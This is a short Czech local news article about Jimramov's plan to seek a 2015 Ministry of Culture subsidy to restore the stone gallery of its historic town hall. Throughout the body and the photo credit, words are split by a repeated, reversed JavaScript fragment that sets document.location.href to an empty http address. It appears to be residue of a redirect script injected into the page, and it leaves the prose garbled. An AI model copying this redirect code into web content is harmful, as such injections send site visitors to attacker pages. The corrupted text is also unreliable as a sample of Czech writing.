Jimramov, dotace
Rainbow page separator

Na opravu pavlače zkusí požádat o dotaci

Neděle, 2. listopadu 2014

Jimramov

Jimramov / Zrestaurovat kamennou pavlač his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické budovy jimramovské radnice plánují tamní zastupitelé. Rozhodli se pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to podat žádost o dotaci z Programu regenerace městských památkových rezervací a městských památkových zón pro rok 2015 z ministerstva kultury.
Náklady na restaurá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torské práce na opravě pavlače jsou vyčísleny na 557 296 korun včetně patnáctiprocentní daně z přidané hodnoty.
Původně renesanční budova radnice byla v letech 1804-1806 přestavěna v klasicistním stylu a do současné podoby upravena v roce 1936. Kromě oficiálního sídla městyse Jimramov objekt, který je kulturní památkou, nabízí rovněž možnost uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com